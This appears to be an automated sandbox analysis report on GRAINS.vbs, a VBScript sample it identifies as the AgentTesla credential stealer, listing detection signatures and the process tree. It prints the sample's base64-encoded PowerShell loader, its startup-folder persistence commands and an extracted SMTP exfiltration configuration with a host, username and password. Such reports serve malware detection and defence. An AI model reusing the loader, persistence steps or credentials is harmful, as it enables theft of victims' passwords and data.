Edit tour
Windows
Analysis Report
GRAINS.vbs
Overview
General Information
| Sample name: | GRAINS.vbs |
| Analysis ID: | 1556595 |
| MD5: | 4bb2f623b8e05072ed01e7fd0e9a4e28 |
| SHA1: | b53851e2fb8d9da46d05c813da5612a04e72242f |
| SHA256: | 929fbee164997ce91edddfa6eae72cad7afd11955480d2582bfdc964505ccea2 |
| Tags: | Formbookvbsuser-abuse_ch |
| Infos: |   |
 | |
Detection
AgentTesla
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Sigma detected: Drops script at startup location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates processes via WMI
Drops VBS files to the startup folder
Injects a PE file into a foreign processes
Installs a global keyboard hook
Powershell is started from unusual location (likely to bypass HIPS)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Reads the Security eventlog
Reads the System eventlog
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Sigma detected: PowerShell Script Run in AppData
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 4132 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\GRAIN S.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
GRAINS.vbs.exe (PID: 6872 cmdline: "C:\Users\ user\Deskt op\GRAINS. vbs.exe" - enc JABYAH IAeQBoAGoA eQBpACAAPQ AgAFsAUwB5 AHMAdABlAG 0ALgBEAGkA YQBnAG4Abw BzAHQAaQBj AHMALgBQAH IAbwBjAGUA cwBzAF0AOg A6AEcAZQB0 AEMAdQByAH IAZQBuAHQA UAByAG8AYw BlAHMAcwAo ACkALgBNAG EAaQBuAE0A bwBkAHUAbA BlAC4ARgBp AGwAZQBOAG EAbQBlAC4A UgBlAHAAbA BhAGMAZQAo ACcALgBlAH gAZQAnACwA JwAnACkAOw AkAEoAeAB0 AGMAZgAgAD 0AIABnAGUA dAAtAGMAbw BuAHQAZQBu AHQAIAAkAF gAcgB5AGgA agB5AGkAIA B8ACAAUwBl AGwAZQBjAH QALQBPAGIA agBlAGMAdA AgAC0ATABh AHMAdAAgAD EAOwAgACQA VQB3AGoAYg BnACAAPQAg AFsAUwB5AH MAdABlAG0A LgBDAG8Abg B2AGUAcgB0 AF0AOgA6AE YAcgBvAG0A QgBhAHMAZQ A2ADQAUwB0 AHIAaQBuAG cAKAAkAEoA eAB0AGMAZg AuAFIAZQBw AGwAYQBjAG UAKAAnAFIA RQBNACAAJw AsACAAJwAn ACkALgBSAG UAcABsAGEA YwBlACgAJw BAACcALAAg ACcAQQAnAC kAKQA7ACQA VgBiAGQAaw B2ACAAPQAg AE4AZQB3AC 0ATwBiAGoA ZQBjAHQAIA BTAHkAcwB0 AGUAbQAuAE kATwAuAE0A ZQBtAG8Acg B5AFMAdABy AGUAYQBtAC gAIAAsACAA JABVAHcAag BiAGcAIAAp ADsAJABQAG kAeABnAHYA eQAgAD0AIA BOAGUAdwAt AE8AYgBqAG UAYwB0ACAA UwB5AHMAdA BlAG0ALgBJ AE8ALgBNAG UAbQBvAHIA eQBTAHQAcg BlAGEAbQA7 ACQAUwB6AH kAaABwAGMA eQB6AG0AIA A9ACAATgBl AHcALQBPAG IAagBlAGMA dAAgAFMAeQ BzAHQAZQBt AC4ASQBPAC 4AQwBvAG0A cAByAGUAcw BzAGkAbwBu AC4ARwB6AG kAcABTAHQA cgBlAGEAbQ AgACQAVgBi AGQAawB2AC wAIAAoAFsA SQBPAC4AQw BvAG0AcABy AGUAcwBzAG kAbwBuAC4A QwBvAG0AcA ByAGUAcwBz AGkAbwBuAE 0AbwBkAGUA XQA6ADoARA BlAGMAbwBt AHAAcgBlAH MAcwApADsA JABTAHoAeQ BoAHAAYwB5 AHoAbQAuAE MAbwBwAHkA VABvACgAIA AkAFAAaQB4 AGcAdgB5AC AAKQA7ACQA UwB6AHkAaA BwAGMAeQB6 AG0ALgBDAG wAbwBzAGUA KAApADsAJA BWAGIAZABr AHYALgBDAG wAbwBzAGUA KAApADsAWw BiAHkAdABl AFsAXQBdAC AAJABVAHcA agBiAGcAIA A9ACAAJABQ AGkAeABnAH YAeQAuAFQA bwBBAHIAcg BhAHkAKAAp ADsAWwBBAH IAcgBhAHkA XQA6ADoAUg BlAHYAZQBy AHMAZQAoAC QAVQB3AGoA YgBnACkAOw AgACQAUwBx AGcAagB6AG cAIAA9ACAA WwBTAHkAcw B0AGUAbQAu AEEAcABwAE QAbwBtAGEA aQBuAF0AOg A6AEMAdQBy AHIAZQBuAH QARABvAG0A YQBpAG4ALg BMAG8AYQBk ACgAJABVAH cAagBiAGcA KQA7ACAAJA BIAGoAYQB2 AGsAeQBtAG kAdQAgAD0A IAAkAFMAcQ BnAGoAegBn AC4ARQBuAH QAcgB5AFAA bwBpAG4AdA A7ACAAWwBT AHkAcwB0AG UAbQAuAEQA ZQBsAGUAZw BhAHQAZQBd ADoAOgBDAH IAZQBhAHQA ZQBEAGUAbA BlAGcAYQB0 AGUAKABbAE EAYwB0AGkA bwBuAF0ALA AgACQASABq AGEAdgBrAH kAbQBpAHUA LgBEAGUAYw BsAGEAcgBp AG4AZwBUAH kAcABlACwA IAAkAEgAag BhAHYAawB5 AG0AaQB1AC 4ATgBhAG0A ZQApAC4ARA B5AG4AYQBt AGkAYwBJAG 4AdgBvAGsA ZQAoACkAIA B8ACAATwB1 AHQALQBOAH UAbABsAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 4884 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
InstallUtil.exe (PID: 6536 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cmd.exe (PID: 636 cmdline:
cmd /c cop y "C:\Wind ows\SysWOW 64\Windows PowerShell \v1.0\powe rshell.exe " "C:\User s\user\Des ktop\GRAIN S.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4464 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wscript.exe (PID: 5124 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\Micro soft\Windo ws\Start M enu\Progra ms\Startup \Xml.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - wscript.exe (PID: 3120 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\Xml.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - cmd.exe (PID: 5504 cmdline:
cmd /c cop y "C:\Wind ows\SysWOW 64\Windows PowerShell \v1.0\powe rshell.exe " "C:\User s\user\App Data\Roami ng\Xml.vbs .exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6552 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - Xml.vbs.exe (PID: 4884 cmdline:
"C:\Users\ user\AppDa ta\Roaming \Xml.vbs.e xe" -enc J ABYAHIAeQB oAGoAeQBpA CAAPQAgAFs AUwB5AHMAd ABlAG0ALgB EAGkAYQBnA G4AbwBzAHQ AaQBjAHMAL gBQAHIAbwB jAGUAcwBzA F0AOgA6AEc AZQB0AEMAd QByAHIAZQB uAHQAUAByA G8AYwBlAHM AcwAoACkAL gBNAGEAaQB uAE0AbwBkA HUAbABlAC4 ARgBpAGwAZ QBOAGEAbQB lAC4AUgBlA HAAbABhAGM AZQAoACcAL gBlAHgAZQA nACwAJwAnA CkAOwAkAEo AeAB0AGMAZ gAgAD0AIAB nAGUAdAAtA GMAbwBuAHQ AZQBuAHQAI AAkAFgAcgB 5AGgAagB5A GkAIAB8ACA AUwBlAGwAZ QBjAHQALQB PAGIAagBlA GMAdAAgAC0 ATABhAHMAd AAgADEAOwA gACQAVQB3A GoAYgBnACA APQAgAFsAU wB5AHMAdAB lAG0ALgBDA G8AbgB2AGU AcgB0AF0AO gA6AEYAcgB vAG0AQgBhA HMAZQA2ADQ AUwB0AHIAa QBuAGcAKAA kAEoAeAB0A GMAZgAuAFI AZQBwAGwAY QBjAGUAKAA nAFIARQBNA CAAJwAsACA AJwAnACkAL gBSAGUAcAB sAGEAYwBlA CgAJwBAACc ALAAgACcAQ QAnACkAKQA 7ACQAVgBiA GQAawB2ACA APQAgAE4AZ QB3AC0ATwB iAGoAZQBjA HQAIABTAHk AcwB0AGUAb QAuAEkATwA uAE0AZQBtA G8AcgB5AFM AdAByAGUAY QBtACgAIAA sACAAJABVA HcAagBiAGc AIAApADsAJ ABQAGkAeAB nAHYAeQAgA D0AIABOAGU AdwAtAE8AY gBqAGUAYwB 0ACAAUwB5A HMAdABlAG0 ALgBJAE8AL gBNAGUAbQB vAHIAeQBTA HQAcgBlAGE AbQA7ACQAU wB6AHkAaAB wAGMAeQB6A G0AIAA9ACA ATgBlAHcAL QBPAGIAagB lAGMAdAAgA FMAeQBzAHQ AZQBtAC4AS QBPAC4AQwB vAG0AcAByA GUAcwBzAGk AbwBuAC4AR wB6AGkAcAB TAHQAcgBlA GEAbQAgACQ AVgBiAGQAa wB2ACwAIAA oAFsASQBPA C4AQwBvAG0 AcAByAGUAc wBzAGkAbwB uAC4AQwBvA G0AcAByAGU AcwBzAGkAb wBuAE0AbwB kAGUAXQA6A DoARABlAGM AbwBtAHAAc gBlAHMAcwA pADsAJABTA HoAeQBoAHA AYwB5AHoAb QAuAEMAbwB wAHkAVABvA CgAIAAkAFA AaQB4AGcAd gB5ACAAKQA 7ACQAUwB6A HkAaABwAGM AeQB6AG0AL gBDAGwAbwB zAGUAKAApA DsAJABWAGI AZABrAHYAL gBDAGwAbwB zAGUAKAApA DsAWwBiAHk AdABlAFsAX QBdACAAJAB VAHcAagBiA GcAIAA9ACA AJABQAGkAe ABnAHYAeQA uAFQAbwBBA HIAcgBhAHk AKAApADsAW wBBAHIAcgB hAHkAXQA6A DoAUgBlAHY AZQByAHMAZ QAoACQAVQB 3AGoAYgBnA CkAOwAgACQ AUwBxAGcAa gB6AGcAIAA 9ACAAWwBTA HkAcwB0AGU AbQAuAEEAc ABwAEQAbwB tAGEAaQBuA F0AOgA6AEM AdQByAHIAZ QBuAHQARAB vAG0AYQBpA G4ALgBMAG8 AYQBkACgAJ ABVAHcAagB iAGcAKQA7A CAAJABIAGo AYQB2AGsAe QBtAGkAdQA gAD0AIAAkA FMAcQBnAGo AegBnAC4AR QBuAHQAcgB 5AFAAbwBpA G4AdAA7ACA AWwBTAHkAc wB0AGUAbQA uAEQAZQBsA GUAZwBhAHQ AZQBdADoAO gBDAHIAZQB hAHQAZQBEA GUAbABlAGc AYQB0AGUAK ABbAEEAYwB 0AGkAbwBuA F0ALAAgACQ ASABqAGEAd gBrAHkAbQB pAHUALgBEA GUAYwBsAGE AcgBpAG4AZ wBUAHkAcAB lACwAIAAkA EgAagBhAHY AawB5AG0Aa QB1AC4ATgB hAG0AZQApA C4ARAB5AG4 AYQBtAGkAY wBJAG4AdgB vAGsAZQAoA CkAIAB8ACA ATwB1AHQAL QBOAHUAbAB sAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6872 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - InstallUtil.exe (PID: 3776 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
{"Exfil Mode": "SMTP", "Port": "587", "Host": "nffplp.com", "Username": "airlet@nffplp.com", "Password": "$Nke%8XIIDtm"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| Click to see the 29 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
| |
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| Click to see the 17 entries | ||||
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||